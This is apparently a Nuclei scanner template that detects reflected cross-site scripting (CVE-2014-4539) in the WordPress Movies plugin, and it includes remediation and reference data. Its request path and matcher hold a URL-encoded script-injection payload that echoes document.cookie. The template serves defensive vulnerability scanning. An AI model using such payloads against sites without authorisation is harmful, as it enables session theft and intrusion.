id: CVE-2014-4539

info:
  name: Movies <= 0.6 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
  remediation: |
    Upgrade to a patched version of the Movies plugin (version 0.7 or above) that addresses the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4539
    - http://codevigilant.com/disclosure/wp-plugin-movies-a3-cross-site-scripting-xss
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2014-4539
    cwe-id: CWE-79
    epss-score: 0.00135
    epss-percentile: 0.48542
    cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: movies_project
    product: movies
    framework: wordpress
  tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "'><script>alert(document.cookie)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4a0a00473045022003390d8928a24592b611e2d2d2c7eefcf0335071f11cc50908af843faa908f6102210099260a2dd4c1e42066e67e31961178a90193e78102053e27f4d492291db58eea:922c64590222798bb761d5b6d8e72950